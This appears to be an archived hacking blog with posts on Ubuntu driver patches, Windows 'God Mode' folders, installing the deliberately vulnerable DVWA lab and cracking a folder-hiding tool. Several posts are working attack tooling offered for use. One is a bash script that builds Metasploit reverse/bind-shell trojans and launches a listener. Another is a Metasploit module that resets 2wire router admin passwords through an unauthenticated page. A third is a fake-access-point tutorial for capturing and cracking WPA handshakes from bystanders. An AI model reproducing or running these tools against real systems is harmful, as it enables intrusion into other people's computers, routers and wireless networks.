The Unl33t

Ubuntu 11.10, aireplay-ng, and the "mon0 is on channel -1" error and how to fix it - shell script included

2012-01-18T19:25:00.025-05:00

I had recently upgrade my Ubuntu install to 11.10. Along with other annoyances I came across I ran into a bit of a deal breaker when I went to run aireplay-ng. I was getting the following error:

mon0 is on channel -1, but the AP uses channel [#]

This was going to be a huge problem since I know that my ZyDAS 1211 chip set was compatible with packet injection. After searching around for a bit I found a great solution from this site here about the drivers and how to patch and reinstall the older ones back in. Below I have a script that you can run to get that installed.

==================================================================

#!/bin/bash
#
# This fix was found at:
# http://linux-software-news-tutorials.blogspot.com/2011/06/solve-error-mon0-is-on-channel-1-but-ap.html
#
# If this script helps you be sure to drop him a line and
# say thanks!
echo -e "\n\033[1;32m###########################################"
echo -e "# Ubuntu Patched Drivers Installer Script #"
echo -e "# Tested on Ubuntu 11.04 and 11.10 #"
echo -e "###########################################"
echo " Coded By: Travis Phillips"
echo " Date: 01/18/2012"
echo " Website: http://theunl33t.blogspot.com"
echo -e -n "\n[*] Installing build-essential...\033[0m"
sudo apt-get -y install build-essential &> /dev/null
echo -e "\033[1;32mDone!"
echo -e -n "\n[*] Downloading Wireless Drivers...\033[0m"
wget http://wireless.kernel.org/download/compat-wireless-2.6/compat-wireless-2011-06-16.tar.bz2 &> /dev/null
echo -e "\033[1;32mDone!"
echo -e -n "\n[*] Extracting...\033[0m"
tar -jxf compat-wireless-2011-06-16.tar.bz2
cd compat-wireless-2011-06-16
echo -e "\033[1;32mDone!"
echo -e -n "\n[*] Downloading Patches...\033[0m"
wget http://patches.aircrack-ng.org/mac80211.compat08082009.wl_frag+ack_v1.patch &>12 /dev/null
wget http://patches.aircrack-ng.org/channel-negative-one-maxim.patch &>12 /dev/null
echo -e "\033[1;32mDone!"
echo -e -n "\n[*] Applying Patches...\033[0m"
patch -p1 < mac80211.compat08082009.wl_frag+ack_v1.patch &> /dev/null
patch ./net/wireless/chan.c channel-negative-one-maxim.patch &> /dev/null
echo -e "\033[1;32mDone!"
echo -e "\n[*] Building patched drivers and installing."
echo -e "\n\t\033[31mTHIS WILL TAKE ABOUT 5-10 mins..."
echo -e "\tPlease be patient and do *NOT* interrupt this process\033[0m\n"
make &> /dev/null
echo -e "\t \033[1;32m[*] Compiling Complete. Installing Drivers...\033[0m\n"
sudo make install &> /dev/null
echo -e "\033[1;32m[*] Installing Patched drivers completed!"
echo -e -n "\n[*] Cleaning Up...\033[0m"
cd ..
rm compat-wireless-2011-06-16.tar.bz2
rm -rf compat-wireless-2011-06-16
echo -e "\033[1;32mDone!"
echo -e "\n\n\t\t[*] \033[1;37mScript Finished! Please reboot to finish the patch.\033[0m\n\n"

==================================================================

To run save it to a save to a file called patchwifidrivers.sh and in a terminal type

chmod +x patchwifidrivers.sh
./patchwifidrivers.sh

Hope this helps some people.

The Many Faces Of God Mode In Windows 7 - With Script

2011-10-03T21:20:00.012-04:00

Some of you may already be familiar with "God Mode" in windows 7. It was a special tool which the Windows developer team left for their sake to make enabling and disabling several of Windows functions quick and easy. However there are more than one of these, I have found 39 and will show you how to access them and also provide a script to do that. It should be noted that these are for Windows 7 and will not work on windows XP (although there are some GUID tricks there to, these just aren't them). The default God Mode was to add ".{ED7BA470-8E54-465E-825C-99712043E01C}" to the end of a folder. So for example if you create a folder titled "Main GodMode.{ED7BA470-8E54-465E-825C-99712043E01C}" it would create a folder called "Main GodMode" which when double-clicked would give you what you see below instead of an empty folder.

However, this is just another parlor trick by the windows explorer. Looking at it from the command line and you will see it's still just a folder, But windows handles it differently.

Looking into the Windows Registry, you can see it is actually accessing a DLL Function in the shell32.dll file in the system32 folder.

With some searching I was able to create a batch file script that will create these "Modules". The script will create a folder in where every it is run called "GodModes" then create 39 known God Mode folders under it for you to use, which gives you a decent "this is what the Control Panel should have been" Folder.

Without further delay. Here is the script.
==================================================================
@echo off
rem \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
rem \\ this script will create a folder in it's \\
rem \\ Current Directory called GodModes and then \\
rem \\ create several "God Mode folders under it \\
rem \\ Which in Windows vista\7 will trigger some \\
rem \\ Control Panel as well as hidden functions \\
rem \\ Hidden in some of windows system DLLs. \\
rem \\ \\
rem \\ Note: Some of these do NOT work on vista. \\
rem \\ For Those it will just show a folder. \\
rem \\ Also one of these only works on win7 Ultimate\\
rem \\ Which is the BitLocker Module \\
rem \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
echo.
echo ***********************************************
echo Enable Windows 7 God Mode Modules v1.0
echo ***********************************************
echo Coded By: Travis Phillips
echo on: 10/03/2011
echo.
echo [*] Creating folder .\GodMode
mkdir "GodModes"
echo.
echo [*] Changing to .\GodMode
cd GodModes
echo.
echo [*] Creating GodMode "Default Geolocation"...
mkdir "Default Geolocation.{00C6D95F-329C-409a-81D7-C46C66EA7F33}"
echo.
echo [*] Creating GodMode "Biometrics"...
mkdir "Biometrics.{0142e4d0-fb7a-11dc-ba4a-000ffe7ab428}"
echo.
echo [*] Creating GodMode "Power Plan"...
mkdir "Power Plan.{025A5937-A6BE-4686-A844-36FE4BEC8B6D}"
echo.
echo [*] Creating GodMode "Personalization Control Panel"...
mkdir "Personalization Control Panel.{ED834ED6-4B5A-4bfe-8F11-A626DCB6A921}"
echo.
echo [*] Creating GodMode "Taskbar Notitification Area"...
mkdir "Taskbar Notitification Area.{05d7b0f4-2121-4eff-bf6b-ed3f69b894d9}"
echo.
echo [*] Creating GodMode "Administration Tools"...
mkdir "Administration Tools.{D20EA4E1-3957-11d2-A40B-0C5020524153}"
echo.
echo [*] Creating GodMode " Windows Vault (Credential Manager - Auto Logon)"...
mkdir "Windows Vault (auto logon).{1206F5F1-0569-412C-8FEC-3204630DFB70}"
echo.
echo [*] Creating GodMode "Ease of Access"...
mkdir "Ease of Access.{D555645E-D4F8-4c29-A827-D93C859C4F2A}"
echo.
echo [*] Creating GodMode "Install Program from the Network"...
mkdir "Install Program from the Network.{15eae92e-f17a-4431-9f28-805e482dafd4}"
echo.
echo [*] Creating GodMode "Network Map"...
mkdir "Network Map.{E7DE9B1A-7533-4556-9484-B26FB486475E}"
echo.
echo [*] Creating GodMode "Default Programs"...
mkdir "Default Programs.{17cd9488-1228-4b2f-88ce-4298e93e0966}"
echo.
echo [*] Creating GodMode "Windows SideShow"...
mkdir "Windows SideShow.{E95A4861-D57A-4be1-AD0F-35267E261739}"
echo.
echo [*] Creating GodMode "DOT NET Framework Modules"...
mkdir "DOT NET Framework Modules.{1D2680C9-0E2A-469d-B787-065558BC7D43}"
echo.
echo [*] Creating GodMode "GPS Sensors"...
mkdir "GPS Sensors.{E9950154-C418-419e-A90A-20C5287AE24B}"
echo.
echo [*] Creating GodMode "Manage Wireless Networks"...
mkdir "Manage Wireless Networks.{1FA9085F-25A2-489B-85D4-86326EEDCD87}"
echo.
echo [*] Creating GodMode "Network"...
mkdir "Network.{208D2C60-3AEA-1069-A2D7-08002B30309D}"
echo.
echo [*] Creating GodMode "My Computer"...
mkdir "My Computer.{20D04FE0-3AEA-1069-A2D8-08002B30309D}"
echo.
echo [*] Creating GodMode "Computers and Devices"...
mkdir "Computers and Devices.{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}"
echo.
echo [*] Creating GodMode "Manage Printers"...
mkdir "Manage Printers.{2227A280-3AEA-1069-A2DE-08002B30309D}"
echo.
echo [*] Creating GodMode "Recent Places"...
mkdir "Recent Places.{22877a6d-37a1-461a-91b0-dbda5aaebc99}"
echo.
echo [*] Creating GodMode "Bluetooth Devices"...
mkdir "Bluetooth Devices.{28803F59-3A75-4058-995F-4EE5503B023C}"
echo.
echo [*] Creating GodMode "Workspaces Center (Remote Connections)"...
mkdir "Workspaces Center (Remote Connections).{241D7C96-F8BF-4F85-B01F-E2B043341A4B}"
echo.
echo [*] Creating GodMode "Windows Firewall"...
mkdir "Windows Firewall.{4026492F-2F69-46B8-B9BF-5654FC07E423}"
echo.
echo [*] Creating GodMode "Favorites"...
mkdir "Favorites.{323CA680-C24D-4099-B94D-446DD2D7249E}"
echo.
echo [*] Creating GodMode "Windows Update"...
mkdir "Windows Update.{36eef7db-88ad-4e81-ad49-0e313f0c35f8}"
echo.
echo [*] Creating GodMode "Rate and Improve Computer Preformance"...
mkdir "Rate and Improve Computer Preformance.{78F3955E-3B90-4184-BD14-5397C15F1EFC}"
echo.
echo [*] Creating GodMode "Main Godmode"...
mkdir "Main Godmode.{ED7BA470-8E54-465E-825C-99712043E01C}"
echo.
echo [*] Creating GodMode "Speech Recognition"...
mkdir "Speech Recognition.{58E3C745-D971-4081-9034-86E34B30836A}"
echo.
echo [*] Creating GodMode "User Accounts"...
mkdir "User Accounts.{60632754-c523-4b62-b45c-4172da012619}"
echo.
echo [*] Creating GodMode "Action Center"...
mkdir "Action Center.{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}"
echo.
echo [*] Creating GodMode "Backup and Restore"...
mkdir "Backup and Restore.{B98A2BEA-7D42-4558-8BD1-832F41BAC6FD}"
echo.
echo [*] Creating GodMode "Backup and Restore"...
mkdir "Display.{C555438B-3C23-4769-A71F-B6D3D9B6053A}"
echo.
echo [*] Creating GodMode "Recovery"...
mkdir "Recovery.{9FE63AFD-59CF-4419-9775-ABCC3849F861}"
echo.
echo [*] Creating GodMode "AutoPlay"...
mkdir "AutoPlay.{9C60DE1E-E5FC-40f4-A487-460851A8D915}"
echo.
echo [*] Creating GodMode "BitLocker Drive Encryption (Ultimate edition only)"...
mkdir "BitLocker Drive Encryption (Ultimate edition only).{D9EF8727-CAC2-4e60-809E-86F80A666C91}"
echo.
echo [*] Creating GodMode "Font Settings"...
mkdir "Font Settings.{93412589-74D4-4E4E-AD0E-E0CB621440FD}"
echo.
echo [*] Creating GodMode "Parental Controls"...
mkdir "Parental Controls.{96AE8D84-A250-4520-95A5-A47A7E3C548B}"
echo.
echo [*] Creating GodMode "Sync Center"...
mkdir "Sync Center.{9C73F5E5-7AE7-4E32-A8E8-8D23B85255BF}"
echo.
echo [*] Creating GodMode "System Information"...
mkdir "System Information.{BB06C0E4-D293-4f75-8A90-CB05B6477EEE}"
echo.
echo [*] Changing back to .\
cd ..
==================================================================

No Access Point? No Problem!: How to get a WPA\WPA2 keys 4-way handshake using Airbase-ng

2011-09-02T00:51:00.019-04:00

Today we are going to look into how to get a WPA\WPA2 keys 4-way handshake from a client using Airbase-ng without them being connected or near their access point. This is useful as a lot of machines will throw beacon probes out for old access points they've connected to (you will see them while running airodump-ng at the bottom right). This means it is looking for that Access Point and wants to connect to it. What we will do with Airbase-ng is pretend we are that access point and let it attempt to connect to us.

So for this tutorial I will be using:
- One Attacker Box running BackTrack 5
- One laptop running XP or 7 pre-configured to connect to a SSID of linksys with a WPA2 key set

Step 1: Going in to Monitor Mode

With that said let's first get things setup on the hacking machine by setting our wireless card into monitor mode using airmon-ng. since my wireless interface is "wlan0" I would use the command "airmon-ng start wlan0". This will give us a virtual interface called "mon0" which is in monitor mode

Step 2a: Setting up the fake AP (Single Known Target Method)

Use this method if you know the Targets AP ESSID or you only want to attack that one; otherwise use Step 2b instead but still read this section to get a better understanding first. Next let's taking a moment to look at the help options for airbase-ng, pictured below.

So now let's set up our options here. For this attack I'm going to use the following command.(Note: This is case sensitive so pay close attention to this)

airbase-ng -F ./Desktop/WPA-attack.cap --essid linksys -Z 2 -c 1 -i mon0 mon0

I owe you a little explanation of what the command does. here's quick break down of what this command does as per the help screen.

usage: airbase-ng <options> <replay interface>

-F prefix : write all sent and received frames into pcap file
--essid <ESSID> : specify a single ESSID (short -e)
-Z type : same as -z, but for WPA2. 1=WEP40 2=TKIP 3=WRAP 4=CCMP 5=WEP104
-c channel : sets the channel the fake AP is going to run on
-i iface : capture packets from this interface

So, basically this command will set up mon0 to listen and answer (-i mon0 mon0) as a WPA2-TKIP access Point (-Z 2) running on channel 1 (-c 1) with the SSID of linksys (--essid linksys) and log all packets to a log file on the desktop (-F ./Desktop/WPA-attack.cap).

Above is a console picture of it in action. As you can see in the last 3 lines the machine is attempting to authenicate to our fake AP, once you see this line once it is safe to open another terminal and try to open the pcap file (in my case ./Desktop/WPA-attack.cap-01.cap) with aircrack-ng to confirm you got a handshake.

So on this note, we see we got a handshake!

Step 2b: Setting up the fake AP (Unknown Target Method)

Warning: This method will attempt to attack every probe it sees! if you didn't know the ESSID of the client or just wanted to attack everyone in the area (airport or coffee shop anyone?) use this type of command.

airbase-ng -P -C 500 -Z 2 -c 1 -i mon0 -F ./Desktop/Probe_hits mon0

It's Pretty much the same as the one from step 2 expect instead of using "--essid linksys" we used "-P -C 500" (case sensitive. So note they are uppercase switches)

usage: airbase-ng <options> <replay interface>

-F prefix : write all sent and received frames into pcap file
-P : respond to all probes, even when specifying ESSIDs
-C seconds : enables beaconing of probed ESSID values (requires -P)
-Z type : same as -z, but for WPA2. 1=WEP40 2=TKIP 3=WRAP 4=CCMP 5=WEP104
-c channel : sets the channel the AP is running on
-i iface : capture packets from this interface

With this approach I changed the victims wireless connection settings from linksys to "testing" as you can see it found it, repeated it, and allow the client to connect. Thus also getting the handshake same as above.

Step 3a: Cracking it with Cowpatty and rainbow tables

This is my preferred method of cracking WPA/WPA2. However Cowpatty (even the install on backtrack) will by default not detect the 4-way handshake obtained with these methods unless you patch it. You can patch it with an article I wrote on how to do this step-by-step or via a script that I coded for that, both of which can be found here. With Cowpatty patch just use the following command:

cowpatty -r ./Desktop/WPA-attack.cap-01.cap -s linksys -d linksysHashTable

In this command the -r points cowpatty to the Capture file with the handshake. The -s is used to indicate the ESSID to the program. Finally, the -d points to my rainbow table for this SSID. If you need rainbow tables for Cowpatty the I recommend you checkout the church of WiFi set from renderlabs webpage as they have a free set containing 33GB of tables made from the top 1,000 SSIDs seen on WiGLE (Wireless Geographic Logging Engine) which is a community for wardrivers to upload their GPS wardriving data and mapped on the site for all to see.

If that image isn't encourgement to get your rainbow tables I don't know what is. Cracked after 395,442 try in about 2.5 seconds!!! So worth the download and space to keep these handy. If the SSID is one not in the kit you can make it following this post here.

Step 3b: Cracking it with aircrack-ng using a Dictionary

In this attack we will use Aircrack-ng with a the default dictionary that comes with BackTrack (located under /pentest/password/wordlist/darkc0de.lst). This is just to show you a second method and give you something to compare the time difference on rainbow table vs. dictionary attacks. To run it just do the following:

aircrack-ng ./Desktop/WPA-attack.cap-01.cap -w /pentest/password/wordlist/darkc0de.lst

On mine it was number two but just hit the number next to the network with the handshake you are attacking. You should see it start to run the attack.

As you can see this worked too but it took 16 mins instead of 2 seconds. Whichever method is easier for you, that's the one to use. Hope this helps some people, if you have any questions feel free to leave a question in the comments area.

Enjoy and stay out of trouble! ;-)

installDVWA.sh - Script to Download, Configure, and launch Damn Vulnerable Web App on Backtrack 5

2011-08-23T19:48:00.012-04:00

So I recently need to automate this process as it had to be done on over 30 machines and I'm lazy and if I have more than once it's getting automated. This thing will get DVWA (Damn Vulnerable Web App) download, unzipped, upload in your web root, configured, and start apache and mysql, setup the mysql database with the DVWA data in ~30-45 seconds.

So first a screenshot of it:

And of course, you'll probably want the code so here it is. ;-)
==================================================================
#/bin/bash
echo -e "\n#######################################"
echo -e "# Damn Vulnerable Web App Installer Script #"
echo -e "#######################################"
echo " Coded By: Travis Phillips"
echo " Website: http://theunl33t.blogspot.com"
echo -e -n "\n[*] Changing directory to /var/www..."
cd /var/www > /dev/null
echo -e "Done!\n"

echo -n "[*] Removing default index.html..."
rm index.html > /dev/null
echo -e "Done!\n"

echo -n "[*] Changing to Temp Directory..."
cd /tmp
echo -e "Done!\n"

echo "[*] Downloading DVWA..."
wget http://voxel.dl.sourceforge.net/project/dvwa/DVWA-1.0.7.zip
echo -e "Done!\n"

echo -n "[*] Unzipping DVWA..."
unzip DVWA-1.0.7.zip > /dev/null
echo -e "Done!\n"

echo -n "[*] Deleting the zip file..."
rm DVWA-1.0.7.zip > /dev/null
echo -e "Done!\n"

echo -n "[*] Copying dvwa to root of Web Directory..."
cp -R dvwa/* /var/www > /dev/null
echo -e "Done!\n"

echo -n "[*] Clearing Temp Directory..."
rm -R dvwa > /dev/null
echo -e "Done!\n"

echo -n "[*] Enabling Remote include in php.ini..."
cp /etc/php5/apache2/php.ini /etc/php5/apache2/php.ini1
sed -e 's/allow_url_include = Off/allow_url_include = On/' /etc/php5/apache2/php.ini1 > /etc/php5/apache2/php.ini
rm /etc/php5/apache2/php.ini1
echo -e "Done!\n"

echo -n "[*] Enabling write permissions to /var/www/hackable/upload..."
chmod 777 /var/www/hackable/uploads/
echo -e "Done!\n"

echo -n "[*] Starting Web Service..."
service apache2 start &> /dev/null
echo -e "Done!\n"

echo -n "[*] Starting MySQL..."
service mysql start &> /dev/null
echo -e "Done!\n"

echo -n "[*] Updating Config File..."
cp /var/www/config/config.inc.php /var/www/config/config.inc.php1
sed -e 's/'\'\''/'\''toor'\''/' /var/www/config/config.inc.php1 > /var/www/config/config.inc.php
rm /var/www/config/config.inc.php1
echo -e "Done!\n"

echo -n "[*] Updating Database..."
wget --post-data "create_db=Create / Reset Database" http://127.0.0.1/setup.php &> /dev/null
mysql -u root --password='toor' -e 'update dvwa.users set avatar = "/hackable/users/gordonb.jpg" where user = "gordonb";'
mysql -u root --password='toor' -e 'update dvwa.users set avatar = "/hackable/users/smithy.jpg" where user = "smithy";'
mysql -u root --password='toor' -e 'update dvwa.users set avatar = "/hackable/users/admin.jpg" where user = "admin";'
mysql -u root --password='toor' -e 'update dvwa.users set avatar = "/hackable/users/pablo.jpg" where user = "pablo";'
mysql -u root --password='toor' -e 'update dvwa.users set avatar = "/hackable/users/1337.jpg" where user = "1337";'
echo -e "Done!\n"

echo -e -n "[*] Starting Firefox to DVWA\nUserName: admin\nPassword: password"
firefox http://127.0.0.1/login.php &> /dev/null &
echo -e "\nDone!\n"
echo -e "[\033[1;32m*\033[1;37m] DVWA Install Finished!\n"
==================================================================

Script to simple using msfpayload & msfencode to create metasploit payload trojans

2011-07-14T15:13:00.007-04:00

The following is a script I coded to simplify the ease of use for using msfpayload and msfencode to create a windows based trojan and set up the listener. Let's face it, scripting is faster and easier. Also insures it is uniform and automated.

The script will do the following:

Determine your IP address automatically for the LHOST of the payload.
Ask if you want a shell or meterpreter
Ask if you want it reverse connection or Bind port TCP
Request the Port number.
at that point it will create two files
trojan.exe - your virus payload
msf_Trojan_Listener - a file with a one liner to create the metasploit listener that works with your payload.
Next it will start msfcli to create a listener.

Here is a screenshot of it in action:

And of course, you'll probably want the code so here it is. ;-)
==================================================================
#!/bin/bash
ENCODINGTIMES=5
IP=`ifconfig | grep 'inet addr' | grep -v '127.0.0.1' | cut -d: -f2 | awk '{print $1}'`
echo -e "\n#######################################"
echo "# MSF Trojan Generator v1.0 #"
echo -e "#######################################"
echo " Coded By: Travis Phillips"
echo " Website: http://theunl33t.blogspot.com"
echo -e "\nYour IP = " $IP
echo -e -n "\n what type of trojan? \n 1) meterpreter \n 2) shell \n\n Which is it: "
read METERORSHELL
echo -e -n "\n What kind of trojan? \n 1) Reverse Connection \n 2) bind_TCP \n\n Which is it: "
read LISTENORREVERSE
echo -e -n "\n What port number are we going to use: "
read PORTNUM

if [ $LISTENORREVERSE = "1" ]; then
LORR='reverse_tcp'
LHOST='LHOST='
else
LORR='bind_tcp'
LHOST=''
IP=''
echo -e "\n Since you want a bind port\nwhat is the IP of the remote host: "
read REMOTEHOST
RH='RHOST='
fi

if [ $METERORSHELL = "1" ]; then
SHELLTYPE='meterpreter'
else
SHELLTYPE='shell'
fi

echo -e "\n[*] Generating trojan with the following: \n -"$SHELLTYPE"/"$LORR "\n -"$LHOST$IP$RH$REMOTEHOST "\n -PORT=" $PORTNUM
echo -e "\n this can take some time. Please wait...\n"

msfpayload windows/$SHELLTYPE/$LORR $LHOST$IP LPORT=$PORTNUM R | msfencode -t exe -o ./trojan.exe -c $ENCODINGTIMES
echo -e "\n[*] Done generating `pwd`/trojan.exe! \n"
ls -l trojan.exe
echo -e "\n[*] Now running listener:\n msfcli multi/handler PAYLOAD=windows/"$SHELLTYPE"/"$LORR $LHOST$IP$RH$REMOTEHOST "LPORT="$PORTNUM "E\n\nNOTE: also saving this to `pwd`/msf_Trojan_Listener for a simple cat/paste later."
echo "msfcli multi/handler PAYLOAD=windows/"$SHELLTYPE"/"$LORR $LHOST$IP$RH$REMOTEHOST "LPORT="$PORTNUM "E" > msf_Trojan_Listener
msfcli multi/handler PAYLOAD=windows/$SHELLTYPE/$LORR $LHOST$IP$RH$REMOTEHOST LPORT=$PORTNUM E

==================================================================

Metasploit module to reset admin password on 2wire wireless routers.

2011-06-22T14:27:00.005-04:00

UPDATE: This module is now a part of metasploit. just run msfupdate and it should be under auxiliary/admin/2wire/xslt_password_reset. For details, see here

Here is a metaploit module I coded to reset the password on a 2wire router. It uses a setup wizard page that doesn't verify if the user is authenticated nor remove itself after first time setup. This can be exploited to reset the password. Without further delay, here is the code.

on my ubuntu box I placed this under /opt/metasploit3/msf3/modules/auxiliary/admin/2wire/2wirepasswordreset.rb

=====================================================
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize
super(
'Name' => '2Wire Password Reset',
'Version' => '$Revision: 1 $',
'Description' => %Q{
This module will reset the admin password on a 2wire wireless router. This works by using a setup wizard
page that fails to check if a user is authenicated and doesn't remove or block after first access.
},
'Author' => 'Travis Phillips',
'License' => MSF_LICENSE
)
register_options(
[
Opt::RPORT(80),
OptString.new('PASSWORD', [ true, 'What you want the password reset to', 'admin'])
], self.class)

end

def run
begin
print_status("Attempting to rest password to #{datastore['PASSWORD']} on #{rhost}\n")
res = send_request_cgi(
{
'method' => 'POST',
'uri' => '/xslt',
'data' => 'PAGE=H04_POST&THISPAGE=H04&NEXTPAGE=A01&PASSWORD=' + datastore['PASSWORD'] + '&PASSWORD_CONF=' + datastore['PASSWORD'] + '&HINT=',
}, 25)
if (res.code == 200)
if (res.headers['Set-Cookie'])
print_status("Password reset successful!\n")
end
end
end
end
end
=====================================================

How to Generate Rainbow Tables for Cowpatty using genpmk to crack WPA/WPA2

2011-06-18T06:33:00.004-04:00

Over the past few days I've had people ask me how to generate rainbow tables for Cowpatty. It's quite simple. Just a few things you should know first:

- Each table is for ONE ESSID. In WPA/WPA2, the SSID of the network is used as a salt to the encryption.

- You will want to find a good password dictionary file. I recommend the Renderlab church of wifi's password list found here.

- Passwords MUST be over 8 characters in length. So if you have a password list, weed out any smaller passwords.

And on with the show. Let's first look at the help screen.

genpmk 1.1 - WPA-PSK precomputation attack.
genpmk: Must specify a dictionary file with -f
Usage: genpmk [options]

-f Dictionary file
-d Output hash file
-s Network SSID
-h Print this help information and exit
-v Print verbose information (more -v for more verbosity)
-V Print program version and exit

After precomputing the hash file, run cowpatty with the -d argument.

So, to generate a rainbow table we need to provide a dictionary, an SSID, and a output file for it to write the hashes. so using the above we can do the following

genpmk -f final-wordlist.txt -s HackMe -d HackMe

This will make it create a Rainbow table called "HackMe" which will contain hashes of all the passwords in the file "final-wordlist.txt" salted with the SSID "HackMe". The output of the shell should update as every 1,000 hashes are created.

The whole process isn't actually all that bad for time and the file size for a rainbow table using the password file I suggest is ~40 MB. Not to bad considering the speed boost it will give when you go to crack it.

Patch, Compile, and Installing coWPAtty 4.6 on Ubuntu

2011-06-18T05:54:00.009-04:00

Cowpatty is a great tool for cracking WPA/WPA2 keys via either a dictionary attack or via rainbow tables. All it needs to see it a client connect to the network (this is called a "handshake"). However cowpatty isn't perfect and has a problem with reading handshakes incorrectly. After looking into this I found a way to install it with the patch on my Ubuntu box.

First we need to download the required files. If you already have them you can skip them.

sudo apt-get install build-essential
sudo apt-get install libssl-dev
sudo apt-get install libpcap0.8-dev
sudo apt-get install libdigest-hmac-perl

Next Download cowpatty 4.6

wget http://wirelessdefence.org/Contents/Files/cowpatty-4.6.tgz
md5sum cowpatty-4.6.tgz

you should get b90fd36ad987c99e7cc1d2a05a565cbd as the MD5 sum. If so, extract and move into the directory using the following

tar -xvf cowpatty-4.6.tgz
cd cowpatty-4.6

Next we need to download the patch and patch the source code.

wget http://proton.cygnusx-1.org/~edgan/cowpatty/cowpatty-4.6-fixup16.patch
patch < cowpatty-4.6-fixup16.patch

Next we will compile and install it and then test it

make
sudo make install
cd ..
cowpatty

If all goes well you should see the cowpatty help menu:

cowpatty 4.6 - WPA-PSK dictionary attack.
cowpatty: Must supply a pcap file with -r

Usage: cowpatty [options]

-f Dictionary file
-d Hash file (genpmk)
-r Packet capture file
-s Network SSID (enclose in quotes if SSID includes spaces)
-c Check for valid 4-way frames, does not crack
-h Print this help information and exit
-v Print verbose information (more -v for more verbosity)
-V Print program version and exit

Now if you're as lazy as me. Here's everything together to work as a script

#/bin/bash
echo -e "\n \e[1;31m[*] Installing build-essential\e[0m"
sudo apt-get -y install build-essential
echo -e "\n \e[1;34m[*] Installing libssl-dev\e[0m"
sudo apt-get -y install libssl-dev
echo -e "\n \e[1;34m[*] Installing libpcap0.8-dev\e[0m"
sudo apt-get -y install libpcap0.8-dev
echo -e "\n \e[1;34m[*] Installing libdigest-hmac-perl\e[0m"
sudo apt-get -y install libdigest-hmac-perl
echo -e "\n \e[1;34m[*] Downloading cowpatty-4.6.tgz\e[0m"
wget http://wirelessdefence.org/Contents/Files/cowpatty-4.6.tgz
md5sum cowpatty-4.6.tgz
echo "\e[1;34mMD5 SHOULD BE b90fd36ad987c99e7cc1d2a05a565cbd\e[0m"
echo -e "\n \e[1;34m[*] Extracting cowpatty-4.6.tgz\e[0m"
tar -xvf cowpatty-4.6.tgz > /dev/null
cd cowpatty-4.6 > /dev/null
echo -e "\n \e[1;34m[*] Downloading Cowpatty Patch\e[0m"
wget http://proton.cygnusx-1.org/~edgan/cowpatty/cowpatty-4.6-fixup16.patch
echo -e "\n \e[1;34m[*] Patching Cowpatty code"
patch < cowpatty-4.6-fixup16.patch
echo -e "\n \e[1;34m[*] Compiling Cowpatty\e[0m"
make
echo -e "\n \e[1;34m[*] Installing cowpatty to system\e[0m"
sudo make install
echo -e "\n \e[1;34m[*] Removing Cowpatty Directory\e[0m"
cd .. > /dev/null
rm -r -f cowpatty-4.6 > /dev/null
echo -e "\n \e[1;34m[*] Removing cowpatty-4.6.tgz\e[0m"
rm cowpatty-4.6.tgz > /dev/null
echo -e "\n \e[1;34m[*] testing to see if cowpatty works\e[0m"
cowpatty
echo -e "\n \e[1;34m[*] Done!\e[0m"

Links:

http://wirelessdefence.org/Contents/Files/cowpatty-4.6.tgz - Get coWPAtty here
http://proton.cygnusx-1.org/~edgan/cowpatty/cowpatty-4.6-fixup16.patch - Patch to fix several issues with cowpatty
http://www.renderlab.net/projects/WPA-tables/ - A place to get 33GB of Rainbow tables for free download.

How to make ubuntu 10.10 use Sun Java instead of OpenJDK

2011-03-16T22:54:00.003-04:00

I had an issue where the default OpenJDK that comes with ubuntu 10.10 was not letting me run an applet I needed. Here is how in 6 commands you can switch from openJDK to Sun Java

sudo apt-get purge openjdk-6-jre openjdk-6-jre-headless
sudo add-apt-repository deb http archive.canonical.com/ maverick partner
sudo apt-get update
sudo apt-get install sun-java6-jre sun-java6-plugin
sudo apt-get install sun-java6-fonts
sudo update-java-alternatives --set java-6-sun

Line 1 : Removes OpenJDK from your machine
Line 2-3: Allows you to use the partner repository which has the sun packages and updates apt
Line 4-5: Installs the needed files needed for the Sun JRE to run
Line 6 : Tells your system to only use the sun java binaries.

Hope this helps

How To Move the Buttons on Ubuntu 10.04 from the Left to the Right with one command

2011-02-08T07:08:00.004-05:00

So, Ubuntu decided to hop on the Apple bandwagon and move the buttons at the top of the window for close, minimize, maximize to the left. This annoyed me to no ends. So after some searching I found this simple one liner!

gconftool-2 --set /apps/metacity/general/button_layout --type string menu:minimize,maximize,close

(Shoutouts to http://www.junauza.com/2010/05/move-ubuntu-1004-window-buttons-from.html for finding this)

Cracking Cleanersoft Free Hide Folder Security

2010-10-04T19:10:00.010-04:00

Introduction

Cleanersoft Free Hide Folder is a "security" tool used to hide your folders. The program uses a simple interface that is protected by a password that lets you hides and unhides selected folders. Our target objectives here will be to find where it is hiding the information about what folders are hidden and recover the password.

Finding where the folder information is stored

Well, We will use the easiest approach, see what files and registry keys the program (fhide.exe) writes to using Process Monitor while hiding a folder (in this case C:\test). This should show us where it is writing to and it seems this approach worked out well.

Well, What have we here. We see a file operation on my C:\test folder, it renamed the folder "CHKDSK.100ÿÿ" and that is followed by a registry key creation at "HKCU\Software\Microsoft\Windows\CurrentVersion\Namespace\getPrefix0".

First let's confirm the folder was renamed. since it is hidden I will run the command line command "DIR /A:SH CHKDSK.*" (the /A:SH will show hidden and system files and folders). Wow... It's right there, great hiding trick.... is it accessible? Run a "cd CHKDSK.100ÿÿ". Looks like we can.

Okay, Let's see whats hidden here with a "Dir" command and we see private.txt. Okay, well it should be encrypted right? guess again... "Type private.txt".

Well We are off a bad start for security. But how do we know where these are hidden if we didn't hide them? How can we find them? Well lets check out that registry key. Okay. Let's take a look at the keys here.

getPrefix0 = E
Declaration0 = X:*XSPWHP.377ÿÿ
Javax0 = X:*gvhg

Hmmm.... Declaration0 and Javax0 both start with X:*, interesting. well. Lets make another hidden folder called C:\test123 which becomes CHKDSK.101ÿÿ. Well, now we have 3 new keys. they are the same names as above but instead we have a one at the end instead of zero.

getPrefix1 = E
Declaration1 = X:*XSPWHP.373ÿÿ
Javax1 = X:*gvhg321

Okay, Starting to see a pattern. It looks like Declaration is for the new hidden file name. Javax is for what it's unhidden name. getPrefix stayed the same. It appears to be a simple substitution cipher. The easy way to figure it out? Well, Let make a folder called C:\abcdefghijklmnopqrstuvwxyz1234567890 and put it side by side with encrypted value and we have a key chart ;-).

